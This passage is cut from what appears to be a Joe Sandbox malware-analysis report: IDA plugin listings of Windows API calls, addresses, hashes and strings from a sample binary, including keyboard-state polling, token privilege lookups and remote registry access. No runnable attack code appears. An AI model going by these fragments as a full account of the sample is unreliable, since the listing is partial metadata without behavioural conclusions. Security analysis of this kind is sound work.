                                                                              • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                              • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                              • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                              • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                              • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                              • String ID:
                                                                              • API String ID: 136442275-0
                                                                              • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                              • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                              • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                              • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
                                                                              • Opcode ID: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
                                                                              • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                              • Opcode Fuzzy Hash: e167cb1a0d39dc08627fc1a452005d5be18e6f56cd7a12c3ea5d5bbd580dbf7f
                                                                              • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                              • _wcslen.LIBCMT ref: 00460502
                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                              • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                              • String ID: ThumbnailClass
                                                                              • API String ID: 4123061591-1241985126
                                                                              • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                              • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                              • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                              • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                              APIs
                                                                                • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                              • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                              • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                              • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                              • ReleaseCapture.USER32 ref: 0046F589
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                              • API String ID: 2483343779-2060113733
                                                                              • Opcode ID: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                              • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                              • Opcode Fuzzy Hash: b963958ab96ed52e1c3ab3b45c628991f908dc465e455618a5f6fc8545d443fb
                                                                              • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                              APIs
                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                              • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                              • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                              • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                              • String ID: 2
                                                                              • API String ID: 1331449709-450215437
                                                                              • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                              • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                              • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                              • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow
                                                                              • String ID: static
                                                                              • API String ID: 3375834691-2160076837
                                                                              • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                              • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                              • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                              • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                              • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                              • _memcmp.LIBCMT ref: 004394A9
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                              Strings
                                                                              • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                              • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                                                              • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                                                              • API String ID: 1446985595-805462909
                                                                              • Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                              • Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
                                                                              • Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
                                                                              • Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D848
                                                                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
                                                                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
                                                                              • API String ID: 2907320926-41864084
                                                                              • Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                              • Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
                                                                              • Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
                                                                              • Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
                                                                              APIs
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 004672E6
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046735D
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467375
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004673ED
                                                                              • SafeArrayGetVartype.OLEAUT32(CE8B7824,?), ref: 00467418
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467445
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 0046746A
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 00467559
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 0046748A
                                                                                • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              • SafeArrayAccessData.OLEAUT32(CE8B7824,?), ref: 00467571
                                                                              • SafeArrayUnaccessData.OLEAUT32(CE8B7824), ref: 004675E4
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$Data$AccessUnaccess$Exception@8ThrowVartype_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                              • String ID:
                                                                              • API String ID: 1932665248-0
                                                                              • Opcode ID: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                              • Instruction ID: 42a0e90c8bf2b482c85e144861ec280134e9fb1dbd9e00a0d693b148f8e5f150
                                                                              • Opcode Fuzzy Hash: 2f069d425a14989955c91583bf1eee78d18cf75f4644af0e6fd4452b58d9bd04
                                                                              • Instruction Fuzzy Hash: E8B1BF752082009FD304DF29C884B6B77E5FF98318F14496EE98587362E779E885CB6B
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00448182
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00448185
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004481A7
                                                                              • _memset.LIBCMT ref: 004481BA
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481CC
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 0044824E
                                                                              • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482A4
                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482BE
                                                                              • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482E3
                                                                              • SendMessageW.USER32(?,0000101E,00000001,00000000), ref: 004482FC
                                                                              • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448317
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow_memset
                                                                              • String ID:
                                                                              • API String ID: 830647256-0
                                                                              • Opcode ID: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                              • Instruction ID: 69fd08a602074ed3d664547bad3ac5a94a9e6c02d61aa1d07dc3907ec7ad0976
                                                                              • Opcode Fuzzy Hash: 45db6e2e50868ce621a7577b0335e91e45f99dc9c013701cc26792922a244152
                                                                              • Instruction Fuzzy Hash: 41616F70208341AFE310DF54C881FABB7A4FF89704F14465EFA909B2D1DBB5A945CB56
                                                                              APIs
                                                                                • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                              • DestroyAcceleratorTable.USER32(?), ref: 0046EA9F
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB04
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB18
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0046EB24
                                                                              • DeleteObject.GDI32(004E0000), ref: 0046EB4F
                                                                              • DestroyIcon.USER32(004D0041), ref: 0046EB67
                                                                              • DeleteObject.GDI32(A39BDBFC), ref: 0046EB7F
                                                                              • DestroyWindow.USER32(0069006C), ref: 0046EB97
                                                                              • DestroyIcon.USER32(?), ref: 0046EBBF
                                                                              • DestroyIcon.USER32(?), ref: 0046EBCD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateRectTableWindow
                                                                              • String ID:
                                                                              • API String ID: 802431696-0
                                                                              • Opcode ID: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                              • Instruction ID: 42d633cefbe7d7192e7a113645d0a532909e6831d49db23f2259be933aabe8c6
                                                                              • Opcode Fuzzy Hash: 294737084f3018da842919bbfa865d3a976cdf3ad66c8c89ec2250206a47d952
                                                                              • Instruction Fuzzy Hash: 17513178600202DFDB14DF26D894E2A77E9FB4AB14B54446EE502CB361EB38EC41CB5E
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,?), ref: 00444D8A
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00444E0F
                                                                              • GetKeyState.USER32(000000A0), ref: 00444E26
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00444E40
                                                                              • GetKeyState.USER32(000000A1), ref: 00444E51
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00444E69
                                                                              • GetKeyState.USER32(00000011), ref: 00444E77
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00444E8F
                                                                              • GetKeyState.USER32(00000012), ref: 00444E9D
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00444EB5
                                                                              • GetKeyState.USER32(0000005B), ref: 00444EC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                              • Instruction ID: c605e69a62dfc64c618b97cb3a1930d242a0674024be490a091b983f03ece729
                                                                              • Opcode Fuzzy Hash: d4a73a67db12bad31d9fb613c99c8778707defbe90317bf640d05d8e99de570f
                                                                              • Instruction Fuzzy Hash: 6A41C3646087C52DFB31966484017E7FFD16FA2708F58844FD1C5067C2DBAEA9C8C7AA
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004508CB
                                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 004508DB
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,00001036,00000000,?,000000FF,?,SysListView32,004848E8,00000000), ref: 004508FC
                                                                              • _wcslen.LIBCMT ref: 00450944
                                                                              • _wcscat.LIBCMT ref: 00450955
                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045096C
                                                                              • SendMessageW.USER32(?,00001061,?,?), ref: 0045099B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window_wcscat_wcslen
                                                                              • String ID: -----$SysListView32
                                                                              • API String ID: 4008455318-3975388722
                                                                              • Opcode ID: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                              • Instruction ID: 786a3889ee88f98d9b0e9b4b0e1dacf7018a6923f31dd28eeaa3c07ad082d1a6
                                                                              • Opcode Fuzzy Hash: 1aeeed20face43e167d1a5b6966347104c1855cbe0e780de9d31d79ee612f7fa
                                                                              • Instruction Fuzzy Hash: 17519470504340ABE330DB65C885FABB3E4AF84714F104E1EFA94972D3D6B99989CB65
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00448625
                                                                              • CreateMenu.USER32 ref: 0044863C
                                                                              • SetMenu.USER32(?,00000000), ref: 0044864C
